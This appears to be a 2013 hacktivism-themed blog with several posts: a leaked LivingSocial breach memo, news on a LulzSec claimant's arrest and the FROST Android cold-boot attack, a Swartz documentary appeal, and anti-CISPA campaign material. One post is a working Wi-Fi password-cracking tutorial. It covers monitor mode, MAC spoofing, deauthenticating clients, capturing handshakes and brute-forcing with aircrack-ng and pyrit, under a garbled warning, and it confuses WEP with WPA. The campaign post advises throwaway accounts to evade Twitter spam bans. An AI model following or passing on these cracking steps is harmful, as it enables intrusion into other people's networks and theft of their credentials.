blogger

Saturday, April 27, 2013

LivingSocial Hacked — More Than 50 Million Customer Names, Emails, Birthdates and Encrypted Passwords Accessed (Internal Memo)

hacked
LivingSocial, the daily deals site owned in part by Amazon, has suffered a massive cyber attack on its computer systems, which an email from CEO Tim O’Shaughnessy — just sent to employees and obtained by AllThingsD.com — said resulted in “unauthorized access to some customer data from our servers.”
The breach has impacted 50 million customers of the Washington, D.C.-based company, who will now be required to reset their passwords. All of LivingSocial’s countries across the world appear to have been affected, except in Thailand, Korea, Indonesia and the Philippines, as LivingSocial units Ticketmonster and Ensogo there were on separate systems.
One positive note in a not-so-positive situation: The email sent to employees and customers noted that neither customer credit card nor merchant financial information was accessed in the cyber attack.
This is the latest big data breach in the consumer Internet space, which has seen troublesome incursions into some high-profile companies recently, including Zappos, LinkedIn and Evernote.
When asked for comment on the email, a LivingSocial PR spokesman confirmed the attack and that 50 million customers were impacted.
The attack comes at a tough time for the company, since it has been trying to turn itself around after a downturn across the daily deals landspace. LivingSocial got a large cash infusion recently from investors to help staunch its losses. Amazon owns 29 percent of the company.
More to come, but here’s the email sent to employees, including one that will be sent to customers soon:
Re: Security Incident
LivingSocialites –
This e-mail is important, so please read it to the end.
We recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue.
The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords — technically ‘hashed’ and ‘salted’ passwords. We never store passwords in plain text.
Two things you should know:
1. * The database that stores customer credit card information was not affected or accessed.
2. * The database that stores merchants’ financial and banking information was not affected or accessed.
The security of our customer and merchant information is our priority. We always strive to ensure the security of our customer information, and we are redoubling efforts to prevent any issues in the future.
To ensure our customers and merchants are fully informed and protected, we are notifying those who may have been impacted via email explaining what happened, expiring their passwords, and requesting that they create new passwords. A copy of the note is included below this email.
If you have any questions or concerns, please visit Pulse –https://pulse.livingsocial.com/intranet/Home/more_updates.html — for a list of frequently asked questions. If you have additional questions that aren’t answered in the FAQs, please submit them via email to XXX@livingsocial.com.
Because we anticipate a high call volume and may not be able to answer or return all calls in a responsible fashion, we are likely to temporarily suspend consumer phone-based servicing. We will be devoting all available resources to our web-based servicing.
I apologize for the formality of this note, which the circumstances demand. We need to do the right thing for our customers who place their trust in us, and that is why we’re taking the steps described and going above and beyond what’s required. We’ll all need to work incredibly hard over the coming days and weeks to validate that faith and trust.
– Tim
Subject: An important update on your LivingSocial.com account
LivingSocial recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue.
The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords — technically ‘hashed’ and ‘salted’ passwords. We never store passwords in plain text.
The database that stores customer credit card information was not affected or accessed.
Although your LivingSocial password would be difficult to decode, we want to take every precaution to ensure that your account is secure, so we are expiring your old password and requesting that you create a new one.
For your security, please create a new password for your < > account by following the instructions below.
1. Visit LivingSocial.com
2. Click on the “Create a New Password” button (top right corner of the homepage)
3. Follow the steps to finish
We also encourage you, for your own personal data security, to consider changing password(s) on any other sites on which you use the same or similar password(s).
The security of your information is our priority. We always strive to ensure the security of our customer information, and we are redoubling efforts to prevent any issues in the future.
Please note that LivingSocial will never ask you directly for personal or account information in an email. We will always direct you to the LivingSocial website — and require you to login — before making any changes to your account. Please disregard any emails claiming to be from LivingSocial that request such information or direct you to a different website that asks for such information.
If you have additional questions about this process, the “Create a New Password” button on LivingSocial.com will direct you to a page that has instructions on creating a new password and answers to frequently asked questions.
We are sorry this incident occurred, and we look forward to continuing to introduce you to new and exciting things to do in your community.
Tim O’Shaughnessy
CEO, LivingSocial

Thursday, April 25, 2013

Arrested Hacker Trolls Australian Feds, Claims to be "Leader of LulzSec"

Arrested "hacker" had a flashy desk job; Anonymous laughs at his wild claims

"It seems you have been living..two lives. In one life, you're Thomas A. Anderson, program writer for a respectable software company....you pay your taxes, and you...help your landlady carry out her garbage. The other life is lived in computers, where you go by the hacker alias...and are guilty of virtually every computer crime we have a law for."
--The Matrix (1999)

I. Sydney Police Catch Corporate Man Moonlighting as a "Hecker"

That quote echoes the situation that a senior staffer at a "prominent" IT firm finds himself in after he was apprehended Monday evening by Australian Federal Police (AFP) following his alleged defacement of an Australian federal government website.  The AFP warns that hacking isn't just "harmless fun" and that they'll hunt down lawbreakers.

The alleged hacker -- or "hecker" as Anonymous sometimes says -- has been released on bail and will be tried in Woy Woy Local Court in Sydney on three computer crimes charges:
 

Two counts of unauthorised modification of data to cause impairment, contrary to section 477.2 of the Criminal Code Act 1995; and

One count of unauthorised access to, or modification of, restricted data, contrary to section 478.1 of the Criminal Code Act 1995.

Australian Police
The Australian Federal Police have caught themselves a hecker.
[Image Source: The Daily Telegraph]

The maximum penalties for the offenses are two years and ten years, respectively.

II. Suspect Claims to be King of LulzSec, Australian Police Get Excited

Authorities report that the man made the astounding claim to be the "leader of LulzSec".  You may recall that LulzSec was the group that in 20111 hacked Sony Corp. (TYO:6758) several times and also breached government sites.  Most of the folks from LulzSec are already in custody or in prison.  And most sources indicate that hacker-turned-double agent for the U.S. federal government Hector Xavier Monsegur (handles: "Sabu", "Xavier DeLeon", and "Leon") was the group's true leader.

Usually when a real LulzSec leader/hacker gets arrested, there's major Twitter traffic, with members of LulzSec parent hacker league Anonymous confirming the validity of the claim.  In this case, it appears the AFP -- and the members of the media who unquestioningly carried their claims -- have been duped.  The local Anonymous branch's Twitter account carried the disclaimer:
So it sounds like the hacker may either have been looking to get famous on the internet or simply trolling the Australian police.  Either way, they bit, parroting his claims proudly at their press conference.

LulzSec
It appeared the AFP were trolled. [Image Source: LulzSec]

This isn't the first time hackers have made a mockery of the Australian feds.  Back in 2009 they claimed to be hack-proof, a claim which earned them a prompt hacking by Anonymous.

https://www.facebook.com/YourAnonymoNews

Wednesday, April 24, 2013

The Internet’s Own Boy




An investigative documentary from director Brian Knappenberger about the life of the internet pioneer and activist Aaron Swartz.
  • Launched: Apr 24, 2013
  • Funding ends: May 24, 2013

Currently titled “The Internet’s Own Boy,” the new film by Brian Knappenberger, director of “We Are Legion: The Story of the Hacktivists,” follows internet activist and programming pioneer Aaron Swartz from his teenage emergence on the internet scene and involvement in RSS and Reddit, to his increased interest in political advocacy and the controversial actions he allegedly took in downloading nearly four million academic articles from the online service JSTOR. The film explores Aaron’s arrest, the prosecution’s tactics in bringing the case to trial through the Computer Fraud and Abuse Act, the CFAA, and the impact a seemingly small hacking gesture had on Aaron’s life and the future of information access on the internet.
WE NEED YOUR HELP!  Independent documentaries created outside the studio or traditional broadcast system face an uphill battle getting made and distributed.  If we are able to raise the funds we need for this film, we hope to get creative with how we bring it to audiences.  In addition to finding as many new ways as possible to share the final documentary, we have decided in the spirit of open access to release the film digitally through a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.  Aaron gave a lot of his time and energy to Creative Commons.  We also hope to find other outlets as well as live screenings, a small theatrical run and bringing it to college campuses and libraries.  We think this is the best way to share this powerful story!
HELP US MAKE IT HAPPEN!  Any contribution gets us closer to the goal.  Obviously the way it works with Kickstarter, if we don't make the goal we don't get anything.
Director Brian Knappenberger
A lot has been written about Aaron, some of it very good, but I felt that taken as a whole it represented a fractured picture of him. I wanted to hear from the people who knew him, explore each chapter of his life and go through his numerous video appearances to have him tell his own story as much as possible. I was well aware of Aaron long before the news broke. I happened to be attending a social computing conference in New York at the time and surrounded by dozens of people who knew Aaron personally. Through their stories it became immediately clear how many diverse corners of the internet Aaron's work touched. A few days into the conference I started recording people’s memories of him on camera, and weeks later I knew I had to go deeper to fully understand what caused such an accomplished and inspired person to take his own life. As became obvious in "We Are Legion" many internet activists are so frustrated with existing systems that they consider them unfixable. But Aaron didn’t fit into this category. Countless friends describe him as someone who wanted to work within the system, to “hack” or use new tools to fix problems in our society – everything from internet freedoms to health care. 
This documentary is an opportunity to explore the influence one incredibly talented programmer and celebrated internet visionary had on the discussion of information access, what his involvement in such a volatile subject means for all internet users, and what his trial has shown us about the cracks in an outdated legal system that lead to such tragic consequences.
WE HAVE ALSO DECIDED AFTER THE FILM IS COMPLETED TO RELEASE THE RAW INTERVIEW FOOTAGE AND POST IT TO THE INTERNET ARCHIVE IN SAN FRANCISCO THROUGH A SIMILAR CREATIVE COMMONS LICENSE.  
“The Internet’s Own Boy” is currently in production. Money raised will go towards setting up further shoots, conducting interviews, facilitating research and collecting archival footage. The project also reunites Knappenberger with We Are Legion: The Story of the Hacktivists soundtrack composer John Dragonetti, who will compose an original score for the film.
YOUR CONTRIBUTIONS ARE CRITICAL to bringing this powerful story to a wider audience!
We anticipate the full film will cost us around $175K to complete, not including distribution, so this is just our first round of asking for funding. We may be back for finishing funds!  Anything from $5 to $5,000 helps and is HUGELY appreciated!
Many thanks for helping us tell this incredible story. It is a significant and poignant chronology of Internet history.

Risks and challenges Learn about accountability on Kickstarter

There are risks inherent in any film made outside the studio system. Mostly that's because the elements are many, including initial research and investigation, archival and original footage and interviews, soundtrack creation, final polishing with color correction and sweetening and then the many facets of distribution to a large audience. Because of Luminant Media's huge experience, we feel like this project has an excellent chance of being completed and going on to screen to huge numbers of people. Dir Brian Knappenberger has an enormous documentary track record.
We are firm believers in the power of independent documentaries. So far we have had such a huge outpouring of people interested in being a part of the documentary (and are truly grateful for their support) that we feel like we are well on the way to making a great and historically important film.
Many thanks!
The Luminant Media team
WE NEED YOUR HELP!

Tuesday, April 23, 2013

Twitter storm v1.0 for #StopCISPA April 24, 2013

    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #          Twitter storm v1.0 for #StopCISPA            #
    #                                                       #
    #             Date:        April 24, 2013               #
    #             Time:          8:00PM GMT                 #
    #                            4:00PM EDT                 #
    #                            1:00PM PDT                 #
    # Goal: Trend #StopCISPA top 5 worldwide, #1 in the US  #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    # Twitter account of Senate members for directed tweets #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
             @Barbara_Boxer (D-Cali) Barbara Boxer
             @PorkBarrel (R-Okla) Tom Cobrun
             @SenatorCollins (R-Maine) Susan Collins
             @JohnCornyn (R-Texas) John Cornyn
             @JimDeMint (R-S.C.) Jim DeMint
             @ChrisDodd (D-Conn) Chris Dodd
             @DickDurbin (D-Ill) Richard Durbin
             @JohnEnsign (R-Nev) John Ensign
             @ChuckGrassley (R-Iowa) Charles Grassley
             @JimInhofe (R-Okla) James Inhofe
             @ClaireCMC (D-Mo) Claire McCaskill
             @SenatorMendez (D-N.J.) Bob Menendez
             @SenJeffMerkley (D-Ore) Jeff Merkley
             @MarkUdall (D-Colo) Mark Udall
             @TomUdall (D-N.M.) Tom Udall
             @MarkWarner (D-Virg) Mark Warner
             @RogerWicker (D-Miss) Roger Wicker
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #   Avoid the Twitter spam ban! Send tweets 2 minutes   #
    #   apart. Send to no more than three @users at a time  #
    # Create a temporary twitter account if you are worried #
    #      about a suspension on your main account!         #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #  Tweet Ideas. Be sure to add #StopCISPA for your own  #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    * CISPA is a violation of my INALIENABLE right to privacy #StopCISPA
    * CISPA allows our information to go to agencies who don't care about our privacy. https://eff.org/CISPA  #StopCISPA
    * We can't have security without privacy. Help us defend the Internet from CISPA! https://eff.org/CISPA  #StopCISPA
    * Preserve privacy and liberty on the Internet. https://eff.org/CISPA  #StopCISPA
    * What have you done to #StopCISPA today? https://cyberspying.eff.org/
    * Does the military really need to know I signed up for Google+ when it first came out, but haven’t posted since? #StopCISPA https://eff.org/r.1X2
    * #CISPA Allows data shared with the government to be used for purposes unrelated to cybersecurity #StopCISPA
    * A free and open internet depends on more privacy, but CISPA gives us less. #StopCISPA https://eff.org/CISPA
    * CISPA sacrifices liberty without improving security. We deserve both. https://eff.org/CISPA #StopCISPA
    * Does the government REALLY want to know what porn I look at? Why? Can't find your own? #StopCISPA
    * Please preserve privacy and liberty on the Internet. #StopCISPA
    * We need a judge's oversight to protect our privacy and a number of other rights. #CISPA removes this #StopCISPA!
    * Lawmakers are pushing a dangerous bill that would threaten Americans' privacy while immunizing companies from any liability. #StopCISPA
    * CISPA resembles a modern, capitalistic version of govt & industry practices once common in the (former) USSR. #StopCISPA
    * If you take ALL my privacies away, we may as well ban the use of clothing too! #StopCISPA
    * #StopCISPA because our privacy and freedom of speech are not for sale to corporate lobbyists!
    * Privacy is SACRED! #CISPA will KILL it! Companies won't be required to strip private info of online users. #StopCISPA
    * Do you want to allow the government the ability to monitor your #FAP sessions? I sure don't! #StopCISPA
    * Not only will this bill infringe upon the rights of US citizens, it will infringe upon the rights of all persons #StopCISPA
    * #CISPA is a violation of the EU privacy and human rights law, it violates international law, and the constitution #StopCISPA
    * A yes vote for this bill, is a no vote for freedom #StopCISPA
    * #StopCISPA Explainer #4: Is There Anything Besides  Information-Sharing Hidden in CISPA? Courtesy of the @ACLU  http://www.aclu.org/blog/national-security-technology-and-liberty/cispa-explainer-4-there-anything-besides-information
    * #StopCISPA Explainer #3: "What Can Be Done With  Information After It Is Shared?" Courtesy of the @ACLU  http://www.aclu.org/blog/national-security-technology-and-liberty/cispa-explainer-3-what-can-be-done-information-after
    * #StopCISPA explainer #2 "Who can info be shared with?"  Courtesy of the @ACLU  http://www.aclu.org/blog/national-security-technology-and-liberty/cispa-explainer-2-whom-can-information-be-shared
    * #StopCISPA explainer #1 "What Information Can Be  Shared?" Courtesy of the @ACLU  http://www.aclu.org/blog/national-security-technology-and-liberty/cispa-explainer-1-what-information-can-be-shared
    * Join millions of your fellow citizens online and protest against the passage of this bill #StopCISPA
    * Protect the freedoms of future generations, make sure they have a right to privacy! #StopCISPA
    * Join the @ACLU and the @EFF and protect the right to privacy! #StopCISPA
    * Google, Microsoft and Facebook have no business reporting my activity online to the FBI #StopCISPA
    * The government wants to read my naughty emails?! Fuck That!! #StopCISPA
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #                  Directed tweet ideas.                  #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    * Your support of CISPA shows your hypocrisy, asking everyone else to  give  up their right to privacy, while you remain able to hold onto  yours. #StopCISPA
    * We're not going to sacrifice all of our liberties for the illusion of safety. #StopCISPA
    * #CISPA overrides existing privacy law, and grants broad immunities to participating companies. #StopCISPA
    * We are deeply unhappy that the House passed #CISPA to destroy everyone's online and by extension offline privacy. #StopCISPA
    * Is this the USA or the Republic Of China? #StopCISPA
    * Until the iron curtain fell, the US Govt & commerce opposed this sort of paranoid-based privacy infringement #StopCISPA
    * #StopCISPA because patriotic Americans oppose secretive & cozy anti-public relations between commerce & the government.
    * Why are you denying me my inalienable rights that have been guaranteed to me in the constitution? #StopCISPA
    * The US government has no rights to monitor my private life, or my activities, this bill is fundamentally flawed. #StopCISPA
    * A yes vote today, means a no vote tomorrow for you, all politicians that support this will be voted out of office #StopCISPA
    * Do you enjoy your cozy 6 figure a year job? #StopCISPA and keep it, vote yes and be voted out!
    * If you vote yes on #CISPA, may come over to your place and watch you piss? #StopCISPA
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    #      Tweet ideas calling for an internet blackout       #
    #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
    * It's time for a #StopCISPA blackout on the order of the #SOPA protests @Google @ericschmidt @Wikipedia @reddit
    * Protest against the passage of #CISPA #StopCISPA @Google @ericschmidt @Wikipedia @reddit
    * Collusion in the business of mass surveillance violates privacy #StopCISPA @Google @ericschmidt @Wikipedia @reddit
    * Companies need no law granting them violation of privacy #StopCISPA @Google @ericschmidt @Wikipedia @reddit
    * Private emails, cloud data, and social media are all affected #StopCISPA @Google @ericschmidt @Wikipedia @reddit


    https://www.facebook.com/YourAnonymoNews


    https://pbs.twimg.com/media/BIh6RN8CcAAi8qi.jpg:large

Monday, April 22, 2013

How to bypass an Android smartphone’s encryption and security: Put it in the freezer

Galaxy Nexus, in the freezer, about to cough up its encryption keys via a cold boot attack

Share This article

Security researchers at the University of Erlangen-Nuremberg in Germany have shown that they can extract photos, surfing history, and contact lists from Android smartphones, even if the phone is locked and the disk is encrypted. The software, called FROST, has been open-sourced by the researchers and is reasonably easy to use, if you’re interested in replicating the results. There is a caveat, though: As the name suggests, you need to put the phone in the freezer first.
The attack vector used by Tilo Müller, Michael Spreitzenbarth, and Felix Freiling is referred to as a cold boot attack. Cold booting (or hard booting) is where you reboot a system by cutting the power completely, and then turning back on. When you restart a computer normally (i.e. a warm reboot), there are usually processes in place that clear/sanitize the system’s memory — but by cold booting and bypassing these processes, the contents of any RAM are preserved.
RAM slowly losing data integrity, as recovered by FROST
Six successive RAM dumps from a Galaxy Nexus, as its RAM slowly loses data integrity.
“But RAM is volatile,” you decry. “RAM loses its data as soon as power is cut,” you plea — and yes, to an extent, you are right. RAM is volatile, and it does require regular spikes of power to retain its data — but when power is cut, it actually takes a few seconds or minutes for the data to be lost. If you have some way of reading the RAM, you can extract all sorts of sensitive information — most notably, the encryption key used to encrypt the local hard drive or flash storage. This fault (feature?) is called data remanence, and it also refers to the tendency for hard drives and other magnetic media to preserve data, even after being wiped.
Recovering FDE encryption keys, with FROST
Reading RAM is difficult, though. In the case of larger computers, you can physically transplant the stick of RAM into another computer, and read off the memory contents there. With embedded devices, such as smartphones, you don’t have that option — which is where FROST (Forensic Recovery Of Scrambled Telephones) comes in. In short, FROST is an Android recovery image — a lot like ClockworkMod — that gives you access to any data stored in RAM after a cold boot. From the main FROST menu, you can attempt to recover the full-disk encryption (FDE) keys from RAM, or simply dump the entire contents of RAM via USB to another PC for further analysis. (See: Full disk encryption is too good, says US intelligence agency.)
A Galaxy Nexus in the freezer, preparing to give up its encryption keysNow, as we mentioned, it can take anywhere from a few seconds to a few minutes for RAM to lose its data. One of the variables that causes this variance is temperature; by cooling RAM down, it preserves data for longer. In one particularly awesome research paper [PDF], liquid nitrogen has been shown to preserve DRAM contents for an entire week. In this particular case, though, the security researchers placed a Samsung Galaxy Nexus into a freezer for an hour, until the phone’s internal temperature dropped to 10C (50F). Then, by quickly removing and inserting the battery (it must be done in under 500 milliseconds), and entering FROST, they were able to make a complete dump of the phone’s RAM. Without the freezer, the phone’s RAM would lose its data before it could be recovered.
While FROST is notable as the first successful example of a cold boot attack on Android, FROST is just the latest in a long line of cold boot attack tools. In a world where full disk encryption is the norm rather than the exception in criminal circles, the ability to recover encryption keys from memory is of vital importance to the FBI, CIA, and other intelligence agencies around the world. It is now standard practice for some police forces to absolutely make sure that computers are not turned off during raids, until they have been fully scanned for encryption keys and any other data that might still be in RAM. There are defenses that can be employed against cold boot attacks, such as not storing encryption keys in RAM, but for now it seems that Android at least is still vulnerable.

New funny hack Click here

This website is offline in protest of CISPA

A archived screenshot in PNG with list of websites that have pledged to join the #CISPAblackout.



http://i.imgur.com/eKcTGCg.jpg

Click on Photo



Wednesday, April 17, 2013

No Digital Big Brother: Keep the Military Out of Your Email

This is it: after months of pitched battles, the Senate is set to vote on cybersecurity this week. Hundreds of thousands of Internet users have spoken out, and Senators listened. The Cybersecurity Act of 2012 has privacy safeguards that don’t exist in any other cybersecurity bill.
But everything could change in the next 5 days.


Here’s what we have to do to defend privacy

  1. Amend the bill to put in stronger safeguards for privacy. The Franken-Paul amendment would ensure that companies do not have new, overbroad authority to monitor and even block our private communications. Senator Wyden has also sponsored an amendment to promote location privacy. We’ve got to rally together to pass these privacy protections, especially the Franken-Paul Amendment.
  2. Stop attempts to remove the privacy protections. Some Senators are pushing an anti-privacy agenda that could undo months of effort. Senators John McCain and Kay Bailey Hutchison have put forth amendments to hand the reins of America’s cybersecurity systems to military intelligence agencies like the National Security Agency—the very agency responsible for the warrantless wiretapping program instituted under the Bush administration. They want to undo all the privacy protections we’ve won and turn the Cybersecurity Act of 2012 into another Big Brother Bill, just like CISPA in the House.
  3. Keep opposing the bill. We need to make it clear to Senators in every state Internet users everywhere oppose this bill. It’s dangerous and it’s unnecessary.

How we can do it

Together, we’ve generated tens of thousands of emails against this bill. But now it’s too late for emails.

Phone calls.

We need to generate thousands of calls.  The American Library Association has an awesome tool that will call your phone for you, give you talking points, and connect you to your Senators. Visit ALA now.

Twitter.

When we launched out Congressional Twitter Handle Detection Tool to fight CISPA, the results were extraordinary. Now we’re bringing it back for then newest fight in the cybersecurity debate. Tweet at your Senator now.

See cyberspying.eff.org for the latest alerts!

Spread the word. 

We need to get the word out to as many people as possible. Will you share this page?
Twitter | Facebook | Identi.ca | G+ |
This is our last chance to stop them. Join EFF, the American Library Association, Fight for the Future, Demand Progress and others in calling on the Senate to stand up for privacy. Tell your Senators to support the Franken-Paul Amendment and other amendments to support privacy, reject anti-privacy proposals, and oppose the Cybersecurity Act as a whole.

Under CISPA, Google, Facebook, Twitter, Microsoft, others can't promise to protect your privacy

Major technology and Web companies — not limited to Google, Facebook, Twitter and Microsoft — will not be allowed to promise to protect users' privacy should CISPA pass Congress.
capdometwi7610x430-620x366
CISPA will soon be voted on in the coming few weeks.
For those out of the loop, CISPA will allow private sector firms to search personal and sensitive user data of ordinary U.S. residents to identify this so-called "threat information", and to then share that information with each other and the US government — without the need for a court-ordered warrant.
Under a new amendment voted on earlier today in the U.S. House [PDF], U.S. companies would have been able to keep their privacy policies intact and their promises valid, including terms of service, legally enforceable in the future.

Read this

What is CISPA, and what does it mean for you? FAQ
What is CISPA, and what does it mean for you? FAQ
But the Republicans narrowly failed to get it through by a 5-8 vote to reject the amendment.
According to CNET's Declan McCullagh, Rep. Pete Sessions (R-TX), who chairs the House Rules Committee, urged his colleagues to reject the amendment. And they did. All Republican members of the committee voted against, despite a unanimous show of support from the Democratic membership.
It would have allowed companies to make promises to their customers not to voluntarily share their data with other private firms or the U.S. government under the law, which would have been legally valid and enforceable in court.
It means that those who signed up to services under the explicit terms that data would not be shared — with perhaps the exception of the U.S. government if a valid court order or subpoena is served — would no longer have such rights going forward.
The amendment would have weakened CISPA's position. Now it gives these private firms watertight legal immunity under CISPA to share their customer and user data with other firms and the U.S. government, by being "completely exonerated from any risk of liability," according to Rep. Jared Polis (D-CO) speaking to our sister site CNET.
This gives private sector firms the right to hand over private user data, while circumventing existing privacy laws, such as emails, text messages, and cloud-stored documents and files, with the U.S. government and its law enforcement and intelligence agencies.
Today, the White House throwed its weight behind a threat that would see CISPA, known as its full title as the Cyber Intelligence Sharing and Protection Act, vetoed by President Obama should it pass his desk.
A vote on CISPA will go ahead on the House floor either on April 17 or April 18.

Tuesday, April 16, 2013

HACK WIFI PASSWORD WITH BACKTRACK 5

WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.
 
Rules to Follow
    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads/
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

 Steps to Follow:
Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download
crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the
wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.
THANKS YOU AND plz follow me in blog.............

Monday, April 15, 2013

How Anonymous have become digital culture's protest heroes

Anonymous hacktivist
'Anonymous' core strength lies in its PR tactics, not its boots-on-the-ground protests or actual hacking skills.' Photograph: Benjamin Larderet/Demotix/Corbis
In 2007, the hacktivist collective Anonymous was dubbed the "internet hate machine" by Fox News for their trolling campaigns. Six years later, they are the white knights of the digital realm, seeking justice for the now deceased 17-year-old Rehtaeh Parsons, an alleged gang rape victim who killed herself after bullying by her Nova Scotian classmates. This is just one of the collective's high profile causes in the past week, but in terms of good PR and an agency for change, it compares to their actions on Steubenville.
They call it #OpJustice4Rehtaeh on Twitter, and all types of people – from journalists and teens to women who normally wouldn't associate with Anonymous – have been spreading Anonymous' related material in the name of Parsons since Tuesday, after news of her mother turning off her daughter's life support made global headlines.
The concerned non-Canadians and feminists in faraway places that joined in the online protest don't consider themselves "hacktivists", nor are they afraid of the FBI or their peers labeling them as terrorist sympathisers. The spooky criminal portrayal of Anonymous has melted from the public consciousness, to be replaced with an image of strangers in pale masks passionate about improving society, one cause at a time. Since Anonymous causes are varied and inspired by current events, jumping on this form of vigilante-motivated activism – or what some would call clicktivism – has never been more popular. Or as in Parsons' case, as effective.
The goal of #OpJustice4Rehtaeh was to seek justice primarily by getting the Canadian justice and police department to review her case. None of the four teen assailants were convicted despite capturing, and then spreading photographic evidence of their alleged crime at Parsons' school.
